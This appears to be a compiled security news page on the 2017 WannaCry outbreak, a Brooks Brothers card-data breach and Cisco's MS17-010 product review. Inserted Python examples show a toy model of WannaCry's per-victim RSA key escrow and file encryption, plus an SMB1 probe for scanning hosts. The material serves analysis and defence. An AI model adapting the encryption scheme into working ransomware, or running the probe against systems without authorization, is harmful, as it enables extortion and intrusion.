Security Response (@threatintel), 16 May 2017: "#WannaCry has code to provide unique bitcoin address for each victim but defaults to hardcoded addresses as a result of race condition bug"
Security experts have warned countless times against paying the ransom in a ransomware attack, as payment does not guarantee that files will be restored. In the WannaCry case it is unlikely that victims get their files back after paying, since the operators cannot tell which victim a payment came from.

More than 260 payments have been made to the three Bitcoin addresses associated with the ransomware, allowing the crooks to collect an estimated $78,000 to date from this campaign alone.

According to a recent tweet from Symantec, WannaCry attackers released a version that fixed the Bitcoin bug soon after the original variant, but most infections contain the flaw. However, the attempt to resolve the bug shows that the hackers’ “main goal was to make money,” the security firm says.

Patches, malware and kill-switch slowed the infection

Over 200,000 computers are estimated to have been hit by the ransomware, but that number could have been much higher if it wasn’t for several conditions, starting with the fact that the attack unfolded heading into a weekend, when many vulnerable computers were offline. Microsoft issuing an emergency patch to address the flaw in older Windows versions also helped.

In a rather strange twist of events, a crypto-currency mining botnet that has been spreading using the very same vulnerability might have limited WannaCry’s infection as well. Dubbed Adylkuzz, the botnet blocks SMB networking immediately after infection, thus preventing other malware from compromising the machine using EternalBlue.

More importantly, a great many attacks were stopped because security researcher @MalwareTechBlog registered a domain the ransomware beacons to before starting the infection. The domain acts as a kill-switch: if the request to it succeeds, the malware terminates its process. A WannaCry variant with no kill-switch was also observed, apparently patched in a hex editor.

While that variant was presumably the work of the same cybercriminals, since the hardcoded Bitcoin wallets were unchanged, newer samples carry different addresses, Bitdefender senior e-threat analyst Bogdan Botezatu told SecurityWeek. Those variants are believed to come from different crooks, and they too were patched on the fly rather than recompiled, Botezatu said.

Hundreds of thousands vulnerable and no free decryptor

The kill-switch domain also works as a sinkhole, and data gathered from it reveals that the WannaCry attacks are ongoing, with over 300,000 infections stopped over the past 24 hours, a live tracker shows. The number includes repeated incidents involving the same individual machines, but the number of vulnerable devices is believed to be in the hundreds of thousands range.
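A beacon that reaches the sinkhole means a machine ran the malware and the kill-switch stopped it, so the sinkhole's web log is effectively an infection-attempt feed. The Python below, added here as an example and not the tracker's own code, shows how to reduce such a log to what matters: total hits, unique source hosts per day, and hosts beaconing repeatedly (the double counting the text mentions). The log lines are constructed, the vhost-prefixed format and the host name "killswitch.example" are assumptions, and the real kill-switch domain is deliberately not reproduced.

```python
"""Summarise kill-switch beacons from a sinkhole's web access log."""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Hypothetical sinkhole host name (assumption; not the real kill-switch domain).
KILL_SWITCH_HOST = "killswitch.example"

# Constructed log lines: vhost-prefixed common log format (%v %h [%t] "%r" %>s).
SAMPLE_LOG = """\
killswitch.example 198.51.100.7 [17/May/2017:10:00:01 +0000] "GET / HTTP/1.1" 200
killswitch.example 198.51.100.7 [17/May/2017:10:00:09 +0000] "GET / HTTP/1.1" 200
killswitch.example 203.0.113.12 [17/May/2017:10:02:13 +0000] "GET / HTTP/1.1" 200
other.example 203.0.113.12 [17/May/2017:10:03:00 +0000] "GET /index.html HTTP/1.1" 200
killswitch.example 198.51.100.7 [18/May/2017:09:30:44 +0000] "GET / HTTP/1.1" 200
killswitch.example 192.0.2.33 [18/May/2017:09:31:02 +0000] "GET / HTTP/1.1" 200
"""

LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})$'
)


def parse_beacons(log_text, host=KILL_SWITCH_HOST):
    """Yield (timestamp, source_ip) for every request that hit the kill-switch vhost."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["vhost"] != host:
            continue           # unparseable line, or traffic for some other vhost
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield ts, m["ip"]


def summarise(log_text, host=KILL_SWITCH_HOST):
    """Collapse repeated beacons: unique hosts per day and who keeps coming back."""
    beacons = list(parse_beacons(log_text, host))
    per_day = defaultdict(set)
    for ts, ip in beacons:
        per_day[ts.date().isoformat()].add(ip)
    hits_per_ip = Counter(ip for _, ip in beacons)
    return {
        "total_hits": len(beacons),
        "unique_hosts": len(hits_per_ip),
        "unique_hosts_per_day": {d: len(ips) for d, ips in sorted(per_day.items())},
        # Same machine (or same NAT gateway) beaconing more than once.
        "repeat_beaconers": sorted(ip for ip, n in hits_per_ip.items() if n > 1),
    }


if __name__ == "__main__":
    print(summarise(SAMPLE_LOG))
```

Two caveats apply when reading these numbers. Unique source IPs are a lower bound on infected machines, because every host behind one NAT gateway shows up as a single address; and a machine that beacons repeatedly is still vulnerable, since the kill-switch only aborts each run, it does not patch anything.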

“We find that there are over 1 million internet-connected devices that expose SMB on port 445. Of those, over 800,000 run Windows, and — given that these are nodes running on the internet exposing SMB — it is likely that a large percentage of these are vulnerable versions of Windows with SMBv1 still enabled (other researchers estimate up to 30% of these systems are confirmed vulnerable, but that number could be higher),” Rapid7’s Roy Hodgman says.

Because of how WannaCry implements its encryption, decrypting files for free is not currently possible, despite tools that claim to restore users' data, Symantec says. The malware uses two hardcoded public keys: one for the demo decryption and one for the main encryption process.

“Once the malware is running on the victim machine it will generate a new unique RSA 2048 bit asymmetric key pair. This means that each victim needs their own decryption key,” the security firm notes.

After generating the new key pair, the malware exports the public RSA key to a local file, then exports the private RSA key, encrypts it with the hardcoded attacker public key and stores the result in another file on disk. It then destroys the private key in memory; because "the lifetime of private victim RSA keys is so limited there is no good option to recover it later once the encryption has happened," Symantec says.

Not every file is encrypted under the victim's RSA public key, whose private half is stored only in encrypted form: the files used for the demo decryption are handled with the hardcoded demo key, which is why some tools can restore a handful of files. According to Symantec, however, only those files are actually decryptable this way.
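To make the key hierarchy concrete, here is a toy Python model of the scheme as Symantec describes it: a per-victim RSA key pair is generated, its private half is escrowed under the attacker's hardcoded public key and then destroyed, and each file is encrypted with a fresh symmetric key wrapped under the victim's public key. This is an added example, not WannaCry's code or Symantec's: it uses textbook RSA without padding, 1024/512-bit keys instead of 2048, and a SHA-256 counter keystream as a stand-in for the per-file cipher, and it does not model the separate demo key pair. Those simplifications are assumptions made to keep the example self-contained; the structure is what matters.

```python
"""Toy model of WannaCry's key hierarchy: per-victim RSA key escrowed under the attacker's key."""
import hashlib
import random
import secrets

# --- minimal textbook RSA (no padding; illustration only, never for real use) ---

def _is_probable_prime(n, rounds=32):
    """Miller-Rabin primality test."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits):
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(candidate):
            return candidate


def rsa_keygen(bits):
    """Return ((n, e), (n, d)). Sizes are reduced for speed; WannaCry used 2048-bit keys."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:          # e is prime, so this means gcd(e, phi) == 1
            return (p * q, e), (p * q, pow(e, -1, phi))


def rsa_enc(pub, m):
    n, e = pub
    assert 0 <= m < n
    return pow(m, e, n)


def rsa_dec(priv, c):
    n, d = priv
    return pow(c, d, n)


def stream_xor(key, data):
    """Stand-in for the per-file symmetric cipher: SHA-256 counter keystream XOR."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + i.to_bytes(8, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)

# --- the scheme ---

# In the real malware only the public half is hardcoded; the private half stays with the attacker.
ATTACKER_PUB, ATTACKER_PRIV = rsa_keygen(1024)

# Constructed sample "victim files".
SAMPLE_FILES = {"report.docx": b"quarterly numbers (constructed sample)", "notes.txt": b"x" * 70}


def infect(files, attacker_pub):
    """Encrypt files; return what is left on disk: victim pub key, escrowed priv key, ciphertexts."""
    victim_pub, (n_v, d_v) = rsa_keygen(512)       # fresh key pair per victim
    escrowed_priv = rsa_enc(attacker_pub, d_v)      # private key stored only encrypted to the attacker
    encrypted = {}
    for name, data in files.items():
        file_key = secrets.token_bytes(16)
        wrapped = rsa_enc(victim_pub, int.from_bytes(file_key, "big"))
        encrypted[name] = (wrapped, stream_xor(file_key, data))
    del d_v                                         # plaintext private key destroyed in memory
    return victim_pub, escrowed_priv, encrypted


def recover(victim_pub, escrowed_priv, encrypted, attacker_priv):
    """Only the attacker's private key unlocks the escrowed victim key, and with it every file."""
    n_v, _ = victim_pub
    victim_priv = (n_v, rsa_dec(attacker_priv, escrowed_priv))
    restored = {}
    for name, (wrapped, ciphertext) in encrypted.items():
        file_key = rsa_dec(victim_priv, wrapped).to_bytes(16, "big")
        restored[name] = stream_xor(file_key, ciphertext)
    return restored


if __name__ == "__main__":
    pub, escrowed, enc = infect(SAMPLE_FILES, ATTACKER_PUB)
    print(recover(pub, escrowed, enc, ATTACKER_PRIV) == SAMPLE_FILES)
```

The chain explains the "no free decryptor" conclusion: everything on the victim's disk is encrypted under a key that only exists in escrowed form, and the escrow can only be opened with a private key that never leaves the attacker. Breaking one victim's files would mean breaking RSA itself or recovering the victim private key from memory before it is destroyed, which is exactly the narrow window the XP PRNG weakness below exploits.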

Some files are recoverable

The good news, however, is that some files can be recovered, especially on older Windows XP versions. The malware overwrites files stored on the Desktop, in My Documents, or on any removable disk attached at the time of infection before deleting them, which defeats undelete and disk recovery tools for those locations; it does not do the same for files stored elsewhere.

For other locations, the malware moves the files to a temporary folder and then deletes them normally, without overwriting them. This means the files may be recoverable, although "the recovery ratio may vary from system to system because the deleted file may be overwritten by other disk operations," Symantec says.

On Windows XP SP1 and SP2, a pseudo-random number generator (PRNG) vulnerability fixed in XP SP3 makes it possible to "predict encryption keys that would be created in the future and, crucially, reveal keys that had been generated in the past." By exploiting the flaw, the decryption key can be recovered from memory, but only while WannaCry is still running.


Over 200 Brooks Brothers Stores Hit by Payment Card Breach

18.5.2017 securityweek Hacking
U.S. clothing retailer Brooks Brothers, which operates more than 400 stores worldwide, informed customers last week that cybercriminals had access to its payment processing systems for nearly one year.

According to the company, attackers installed malware designed to capture payment card data at many of its retail and outlet locations. While the organization does not store card data, the malware intercepted information as it passed through its systems.

Customers who made purchases at certain Brooks Brothers locations in the U.S. and Puerto Rico between April 4, 2016, and March 1, 2017, may have had their payment card information stolen. The exposed information includes names, credit and debit card numbers, card expiration dates, and verification codes. However, not all transactions were affected.

The retailer pointed out that social security numbers or other personally identifiable information was not compromised in the breach. It also noted that online transactions were not at risk, and Brooks Brothers airport locations were not impacted.

Brooks Brothers has set up a web page that lists all the impacted locations in each state. More than 220 stores are listed, with a majority in California, Florida, Massachusetts, New Jersey, New York, North Carolina, Pennsylvania and Texas.

The company is confident that the malware has been removed from its systems. Law enforcement has been alerted and experts have been called in to investigate the incident and assist with remediation efforts.

Brooks Brothers has provided some advice on what potentially affected customers can do to protect themselves against payment card fraud, but pointed out that it cannot be certain whether any particular individual is affected, which is why it will not call or email anyone regarding the breach. It’s not uncommon for scammers to take advantage of such incidents to trick people into handing over personal and financial information.

Customers who have concerns or questions can call 888-735-5927 between 9:00 AM and 9:00 PM ET, Monday through Friday.

Brooks Brothers is not the only major clothing retailer to suffer a data breach recently. Last year, Eddie Bauer informed customers that its payment processing systems had been infected with malware for more than six months.


Cisco starts assessing its products against the WannaCry vulnerability
18.5.2017 securityaffairs Ransomware

Cisco has announced an investigation into the potential impact of the WannaCry malware on its products.
The recent massive WannaCry ransomware attack highlighted the importance of patch management for every organization and Internet user.

Cisco announced it is investigating the potential impact of WannaCry on its products, in particular on those that cannot be patched against the flaw exploited by the malware.

The initiative is meant to protect Cisco customers by establishing which of the company's products are exposed.

The Cisco Product Security Incident Response Team (PSIRT) announced the investigation on Monday.

“The Cisco PSIRT Team is continuing to investigate the impact of this vulnerability on Cisco products that have not reached end of software maintenance support and that do not support automated or manual updates of the Microsoft patch for these vulnerabilities. Investigation is expected to be completed by Friday, May 19th.” states the announcement. “Currently no products have been found to prevent the automatic or manual installation of the MS17-010 patches or not function properly with the MS17-010 patches applied.”

According to Cisco's announcement, its experts will investigate the impact of the vulnerabilities patched by MS17-010 on products that support neither manual nor automated installation of the Microsoft patch.

The goal is to identify products that cannot be fixed.

“Currently no additional guidance other than to apply the Microsoft patches or disable SMBv1 is applicable.” continues the advisory.
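Both pieces of advice, patching MS17-010 and disabling SMBv1, can be verified from the outside with one SMB1 NEGOTIATE request: a host that still accepts an SMB1 dialect is exactly the exposure Rapid7 counted on port 445 above. The Python below, an added example rather than Cisco or Rapid7 tooling, builds that request, classifies the reply, and includes a live probe for hosts you are authorized to test. The sample response used offline is constructed; the assumption that a server with SMBv1 disabled drops the session when only SMB1 dialects are offered, rather than answering, is the behaviour the "closed" result relies on, and a firewall reset produces the same result, so treat "closed" as "not SMB1" rather than as proof of hardening.

```python
"""Check whether a host still negotiates SMB1, the protocol EternalBlue targets."""
import socket
import struct

SMB_COM_NEGOTIATE = 0x72


def build_smb1_negotiate(dialects=(b"NT LM 0.12",)):
    """SMB1 NEGOTIATE request offering only SMB1 dialects, wrapped in a NetBIOS session header."""
    dialect_data = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    header = struct.pack(
        "<4sB4sBH2s8s2sHHHH",
        b"\xffSMB",            # SMB1 protocol identifier
        SMB_COM_NEGOTIATE,
        b"\x00" * 4,           # NT status
        0x18,                  # flags: canonical path names, case-insensitive
        0xC853,                # flags2: unicode, NT status codes, extended security, long names
        b"\x00" * 2,           # PID high
        b"\x00" * 8,           # security signature
        b"\x00" * 2,           # reserved
        0, 0xFEFF, 0, 0,       # TID, PID low, UID, MID
    )
    body = struct.pack("<BH", 0, len(dialect_data)) + dialect_data   # WordCount, ByteCount, dialects
    smb = header + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb              # NetBIOS session message


def classify_negotiate_response(raw):
    """Interpret the server's reply to the request above."""
    if not raw:
        return "closed"          # session dropped: SMB1 refused (or a firewall reset the connection)
    payload = raw[4:]            # strip the NetBIOS session header
    if payload.startswith(b"\xfeSMB"):
        return "smb2-only"       # SMB2 answer (only seen if an SMB 2.x dialect was offered)
    if not payload.startswith(b"\xffSMB") or len(payload) < 35:
        return "malformed"
    status = struct.unpack_from("<I", payload, 5)[0]
    dialect_index = struct.unpack_from("<H", payload, 33)[0]   # first word after WordCount
    if status != 0 or dialect_index == 0xFFFF:
        return "smb1-rejected"   # answered in SMB1 but accepted none of the offered dialects
    return "smb1-accepted"       # SMB1 is live: apply MS17-010 or disable SMBv1


def probe_smb1(host, port=445, timeout=3.0):
    """Live check against one host (network access required; not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_smb1_negotiate())
        try:
            reply = sock.recv(4096)
        except (ConnectionResetError, socket.timeout):
            reply = b""
    return classify_negotiate_response(reply)


def sample_smb1_negotiate_response(dialect_index):
    """Constructed SMB1 NEGOTIATE response (WordCount 17) for offline testing."""
    header = struct.pack("<4sB4sBH2s8s2sHHHH", b"\xffSMB", SMB_COM_NEGOTIATE, b"\x00" * 4,
                         0x98, 0xC853, b"\x00" * 2, b"\x00" * 8, b"\x00" * 2, 0, 0xFEFF, 0, 0)
    words = struct.pack("<H", dialect_index) + b"\x00" * 32        # DialectIndex + 16 more words
    body = struct.pack("<B", 17) + words + struct.pack("<H", 0)     # WordCount, words, ByteCount
    smb = header + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    import sys
    for target in sys.argv[1:]:
        print(target, probe_smb1(target))
```

Offering only "NT LM 0.12" is deliberate: if "SMB 2.002" were in the dialect list, a server with SMB1 disabled would answer in SMB2 and the result would say nothing about SMB1. Run it only against systems you are allowed to scan.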

Cisco published Snort rules (42329-42332, 42340, 41978) and a Cisco IPS (Intrusion Prevention System) signature pack to detect and block WannaCrypt traffic.

Hopefully other IT vendors that ship products running Windows will also assess their products.